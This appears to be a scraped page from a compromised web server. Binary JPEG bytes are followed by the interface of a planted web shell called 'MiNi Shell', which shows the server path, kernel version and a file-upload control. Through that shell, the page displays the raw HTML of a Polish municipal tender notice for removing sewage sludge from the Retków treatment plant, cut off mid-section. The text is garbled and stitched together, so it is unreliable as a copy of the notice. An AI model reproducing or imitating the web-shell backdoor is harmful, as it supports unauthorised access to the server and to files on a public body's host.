JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211215/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211215/0031720901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór, załadunek, transport i zagospodarowanie poprzez odzysk lub unieszkodliwienie skratek, zawartości piaskowników i ustabilizowanych osadów ściekowych z oczy. ścieków Centralna w Retkowie w 2022r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Stanisławów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582434</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stanisławów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-304</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">25 7575858</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">25 7575857</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad.gminy@stanislawow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.stanislawow.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór, załadunek, transport i zagospodarowanie poprzez odzysk lub unieszkodliwienie skratek, zawartości piaskowników i ustabilizowanych osadów ściekowych z oczy. ścieków Centralna w Retkowie w 2022r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3cf5398d-5daa-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00317209</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000933/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Odbiór, załadunek, transport i zagospodarowanie poprzez odzysk lub unieszkodliwienie skratek, zawartości piaskowników i ustabilizowanych osadów ściekowych z oczy. ścieków Centralna w Retkowie w 2022r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.stanislawow.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniPortal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Zamawiający nie przewiduje komunikacji z wykonawcą w inny sposób niż przy użyciu środków komunikacji elektronicznej.<br/>2.	W niniejszym postepowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniportalu https://miniportal.uzp.gov.pl, ePUAPu https://epuap.gov.plwsp/portal oraz poczty elektronicznej e mail: inwestycje@stanislawow.pl (nie dotyczy składania oferty oraz dokumentów składanych wraz z ofertą).<br/>3.	Wykonawca, który zamierza wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji. <br/>4.	Wymagania techniczne i organizacyjne, wysyłanie i odbieranie dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w regulaminie korzystania z miniPortalu oraz Regulaminu ePUAP.<br/>5.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>6.	Za datę przekazania oferty, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>7.	Identyfikator postępowania i klucz publiczny dla danego postepowania o udzielenia zamówienia dostępne są na Liście wszystkich postepowań na miniPortalu.<br/>8.	We wszelkiej korespondencji wiązanej z niniejszym postepowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP, TED lub ID postępowania).<br/>9.	Jeżeli zamawijący lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2020 r. oświadczeniu usług drogą elektroniczną, każda ze stron na żądanie drugiej strony niezwłocznie potwierdza fakt ich otrzymania.<br/>10.	W przypadku braku potwierdzenia otrzymania korespondencji przez wykonawcę, zamawiający domniema, że oświadczenia, wnioski, zawiadomienia oraz informacje wysłane przez zamawiającego na adres epuap lub adres e-mail podany przez Wykonawcę, zostały doręczone w sposób umożliwiający zapoznanie się z ich treścią. <br/>11.	Zamawiający nie przewiduje przeprowadzenia negocjacji z Wykonawcami.<br/>12.	Wykonawca może zwrócić się do Zamawiającego o przekazanie SWZ poprzez złożenie wniosku. Wniosek musi zawierać: nazwę i adres Wykonawcy, nr telefonu, e -mail, znak postepowania. <br/>13.	SWZ została opublikowana na stronie www.bip.stanislwow.pl oraz można ja także odebrać w siedzibie Zamawiającego w Urzędzie Gminy Stanisławów ul. Rynek 32, 05-304 Stanisławów w godzinach urzędowania.<br/>14.	Każdy wykonawca ma prawo zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ zgodnie z art. 284 ust. 1 <br/>15.	Zamawiający udzieli niezwłocznie wyjaśnień/odpowiedzi wszystkim Wykonawcom, którzy otrzymali SWZ, bez ujawniania źródła zapytania oraz zamieszcza na stronie internetowej prowadzonego postepowania.<br/>16.	W szczególnie uzasadnionych przypadkach Zamawiający może, przed upływem terminu składania ofert zmienić treść SWZ, którą udostępnia na stronie internetowej prowadzonego postepowania.<br/>17.	Wyjaśnienia dotyczące SWZ udzielane będą z zachowaniem zasad określonych w art. 284 ustawy Pzp.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W związku z realizacją wymogów Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (zwane dalej „RODO”), Administrator informuje o zasadach oraz o przysługujących Pani/Panu prawach związanych z przetwarzaniem Pani/Pana danych osobowych.<br/>1.	Administrator<br/>Administratorem Pani/Pana danych osobowych jest Wójt Gminy Stanisławów z siedzibą przy ul. Rynek 32 w Stanisławowie (05-304 Stanisławów).<br/>2.	Inspektor ochrony danych<br/>Z inspektorem ochrony danych (zwany dalej „IOD”) wyznaczonym przez Administratora może się Pani/Pan kontaktować w następujący sposób:<br/>a) pocztą tradycyjną na adres: IOD, ul. Rynek 32, 05-304 Stanisławów, <br/>b) pocztą elektroniczną na adres e-mail: iod@stanislawow.pl.<br/><br/>Do IOD należy kierować wyłącznie sprawy dotyczące przetwarzania Pani/Pana danych osobowych przez administratora, w tym realizacji Pani/Pana praw wynikających z RODO.<br/>3.	Cele oraz podstawa prawna przetwarzania Pani/Pana danych osobowych<br/>Pani/Pana dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO, tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze dotyczącego zawarcia umowy w wyniku udzielenia zamówienia publicznego zgodnie z przepisami ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843 ze zm.), (zwana dalej „ustawa Pzp”). Celem przetwarzania danych osobowych jest realizacja umowy i dochodzenie ewentualnych roszczeń wynikających z umowy.<br/>4.	Odbiorcy danych osobowych<br/>Odbiorcą Pani/Pana danych osobowych będą podmioty współpracujące z administratorem, w tym dostawcy usług technicznych i organizacyjnych umożliwiających wykonanie umowy oraz przechowywanie dokumentacji jej dotyczącej, osoby i podmioty upoważnione na podstawie przepisów prawa powszechnie obowiązującego.<br/>5.	Okres przechowywania danych<br/>Pani/Pana dane osobowe będą przechowywane przez 4 lata od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata przez cały czas trwania umowy oraz do czasu przedawnienia ewentualnych roszczeń wynikających z umowy. Ponadto dane osobowe będą przechowywane zgodnie z przepisami ustawy o narodowym zasobie archiwalnym i archiwach oraz rozporządzenia w sprawie klasyfikowania i kwalifikowania dokumentacji, przekazywania materiałów archiwalnych i przepisami wewnętrznymi administratora.<br/>6.	Prawa osoby, której dane dotyczą<br/>Przysługuje Pani/Panu prawo:<br/>a)	dostępu do danych osobowych, w tym prawo do uzyskania kopii tych danych,<br/>b)	do sprostowania (poprawiania) danych,<br/>c)	do usunięcia danych osobowych,<br/>d)	do ograniczenia przetwarzania danych,<br/>e)	do sprzeciwu wobec przetwarzania danych osobowych,<br/>f)	do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych na adres Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00 - 193 Warszawa.<br/>7.	Dobrowolność/ Obowiązek podania danych osobowych<br/>Obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego oraz zawarciem i realizacją umowy. Konsekwencje niepodania danych osobowych wynikają z ustawy Pzp. <br/>8.	Zautomatyzowane podejmowanie decyzji, w tym profilowanie<br/>Pani/Pana dane osobowe nie będą profilowane ani też nie będą podlegały zautomatyzowanemu podejmowaniu decyzji.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIiOŚ.271.17.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest odbiór, załadunek, transport i zagospodarowanie poprzez odzysk lub unieszkodliwienie skratek, zawartości piaskowników i ustabilizowanych osadów ściekowych z oczyszczalni ścieków „Centralna” w Retkowie, gmina Stanisławów, położonej na działce nr ewid. 713, 720, 726, 731 w miejscowości Retków. Wykonanie zadania będzie polegało na bezpośrednim odbiorze z terenu oczyszczalni ścieków „Centralna” w Retkowie skratek (kod 19 08 01, zawartości piaskowników (kod 19 08 02), oraz ustabilizowanych komunalnych osadów ściekowych (kod 19 08 05), po telefonicznym zgłoszeniu przez Zamawiającego.<br/>2.	Zamówienie ma być realizowane zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach <br/>(Dz. U. z 2019 r., poz. 701 ), Rozporządzeniem Ministra Środowiska z dnia 6 lutego 2015 roku w sprawie komunalnych osadów ściekowych (Dz.U. z 2015 r., poz. 257) oraz ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2019 r., poz. 1396 z późn.zm.) Skratki, zawartość piaskowników oraz ustabilizowane osady ściekowe odbierane będą przez Wykonawcę po telefonicznym zgłoszeniu przez Zamawiającego. Odbiór przedmiotu zamówienia będzie się odbywał w zależności od potrzeb, tj. w miarę ich wytwarzania. Wykonawca zobowiązany jest do odbioru w ciągu maksymalnie 48 godzin od chwili zgłoszenia. W momencie odbioru Wykonawca jest obowiązany do podstawienia nowego, pustego kontenera/pojemnika. Przewidywana przez Zamawiającego ilość odpadów wytworzonych w okresie trwania zamówienia wynosi:<br/>- skratki (kod odpadu:19 08 01) ok. 30 Mg/rok,<br/>- zawartość piaskowników (kod odpadu: 19 08 02) ok. 10 Mg/rok,<br/>- ustabilizowane komunalne osady ściekowe (kod odpadu: 19 08 05) ok. 840 Mg/rok.<br/><br/>3.	Ilość wytworzonych odpadów uzależniona jest od ilości i jakości ścieków doprowadzonych <br/>na oczyszczalnię. Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia ilości przekazywanych odpadów w okresie trwania zamówienia, co nie może stanowić podstawy do odstąpienia przez Wykonawcę od umowy i nie powoduje żadnych roszczeń Wykonawcy wobec Zamawiającego. Na koniec każdego miesiąca Wykonawca przekazuje Zamawiającemu zbiorcze zestawienie potwierdzonych kart przekazania odpadów i osadów. Odbiór odpadów i osadów będzie się odbywał bezpośrednio z terenu oczyszczalni ścieków „Centralna” w Retkowie. Odbiór i wywóz przedmiotu zamówienia będzie realizowany przez Wykonawcę przy użyciu własnych narzędzi oraz własnym środkiem transportu, maksymalnie po upływie 48 godzin od chwili zgłoszenia przez Zamawiającego. Wykonawca zobowiązany jest do wywozu osadu i odpadów z miejsca ich wytwarzania do miejsca ich odzysku lub unieszkodliwiania, zgodnie z obowiązującymi przepisami prawa. Wykonawca przejmuje od Zamawiającego odpowiedzialność za gospodarowanie tymi odpadami. Rozliczenie będzie realizowane raz w miesiącu, za faktycznie odebraną ilość osadów ściekowych, skratek i zawartości piaskowników w danym miesiącu. Zgodnie z zapisami ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2019 r., poz. 701), przez gospodarowanie odpadami rozumie się zbieranie, transport, przetwarzanie odpadów, łącznie z nadzorem nad tego rodzaju działaniami, jak również późniejsze postępowanie z miejscami unieszkodliwiania odpadów oraz działania wykonane w charakterze sprzedawcy odpadów lub pośrednika w obrocie odpadami. Wykonawca musi posiadać decyzję właściwego organu na prowadzenie działalności w zakresie gospodarki odpadami pochodzącymi z oczyszczalni ścieków stosownie do określonego przedmiotu zamówienia. Wykonawca powinien również posiadać zezwolenie na transport osadów oraz decyzję zezwalającą na odzysk lub/i unieszkodliwienie odpadów. Przekazanie komunalnych osadów ściekowych, skratek i zawartości piaskowników będzie odbywało się na terenie oczyszczalni ścieków „Centralna” w Retkowie. <br/>4.	Po odebraniu przez Wykonawcę skratek, zawartości piaskowników oraz ustabilizowanych osadów ściekowych od Zamawiającego, pełna odpowiedzialność za nie w rozumieniu przepisów ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2019 r., poz. 701) przechodzi na Wykonawcę. Wykonawca powinien dysponować środkami transportu drogowego, dostosowanymi do odbioru przedmiotu zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. Wskazane jest dokonanie przez Wykonawcę wizji lokalnej na miejscu odbioru odpadów, celem zapoznania się z warunkami technicznymi i przestrzennymi odbioru odpadów. Wykonawca przyjmuje na siebie odpowiedzialność za zagospodarowanie odpadów i jest obowiązany do gospodarowania odpadem w sposób zgodny z zasadami gospodarowania odpadami i wymaganiami ochrony środowiska. Zgodnie z art. 20 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2019 r., poz. 701). Odpady, przekazuje się, uwzględniając hierarchię sposobów postępowania z odpadami oraz najlepszą dostępną technikę lub technologię, do najbliżej położonych miejsc, w których mogą być przetworzone. Zakazuje się stosowania komunalnych osadów ściekowych poza obszarem województwa, na którym zostały wytworzone. Komunalne osady ściekowe mogą być stosowane na obszarze województwa innego niż to, na którym zostały wytworzone, jeżeli odległość od miejsca wytwarzania odpadów do miejsca stosowania położonego na obszarze innego województwa jest mniejsza niż odległość do miejsca stosowania położonego na obszarze tego samego województwa.<br/><br/>4.	Wspólny Słownik Zamówień CPV: <br/>90513800-4 usługi obróbki osadów<br/>90513600-2 usługi usuwania osadów<br/>90513700-3 usługi transportu osadów<br/>90513900-5 usługi likwidacji osadów<br/>90500000-2 usługi związane z odpadami<br/>90511000-2 usługi wywozu odpadów<br/><br/>Szczegółowy opis przedmiotu zamówienia stanowi załącznik do niniejszej Specyfikacji Warunków Zamówienia (SWZ).<br/>5.	Zamawiający nie dopuszcza składania ofert częściowych.<br/>6.	Zamawiający nie dopuszcza składania ofert wariantowych.<br/>7.	Zgodnie z art. 99 ust. 5 ustawy Pzp, zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca musi wykazać równoważność oferowanego przedmiotu zamówienia poprzez wskazanie w opisie rozwiązania równoważnego na podstawie zawartych w opisie przedmiotu zamówienia kryteriów oceny równoważności.<br/>8.	Zamawiający dopuszcza powierzenie zamówienia podwykonawcom wykonawcy. W takim przypadku wykonawca ma obowiązek (zgodnie z art. 462 ust. 2 ustawy Pzp) wskazania części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podania nazw ewentualnych podwykonawców, o ile są znani.<br/>Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 , w celu wykazania spełniania warunków udziału w postepowaniu, wykonawca jest obowiązany wykazać zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.<br/>9.	Zamawiający stosownie do art. 95 ust. 1 ustawy Pzp, określa obowiązek zatrudnienia na podstawie stosunku pracy osób wykonujących następujące czynności w zakresie realizacji zamówienia tj.: kierowanie pojazdami jeżeli wykonanie tych czynności będzie w przypadku danego wykonawcy polegało na wykonywaniu pracy w rozumieniu przepisów art. 22 § 1 kodeksu pracy.<br/>10.	Wykonawca na wezwanie, przedstawi Zamawiającemu wykaz osób biorących udział w realizacji zamówienia wraz ze wskazaniem czynności, jakie osoby te będą wykonywać oraz informacją o sposobie zatrudnienia tych osób.<br/>11.	Wykonawca zobowiązany jest do informowania Zamawiającego o każdym przypadku zmiany osób wykonujących czynności wymienione w ust. 11 lub zmiany sposobu zatrudnienia tych osób, nie później niż w terminie 7 dni od dokonania takiej zmiany. Każdorazowa zmiana wykazu osób nie wymaga aneksu do niniejszej umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <p class="mb-0">90513600-2 - Usługi usuwania osadów</p> <p class="mb-0">90513700-3 - Usługi transportu osadów</p> <p class="mb-0">90513800-4 - Usługi obróbki osadów</p> <p class="mb-0">90513900-5 - Usługi likwidacji osadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki 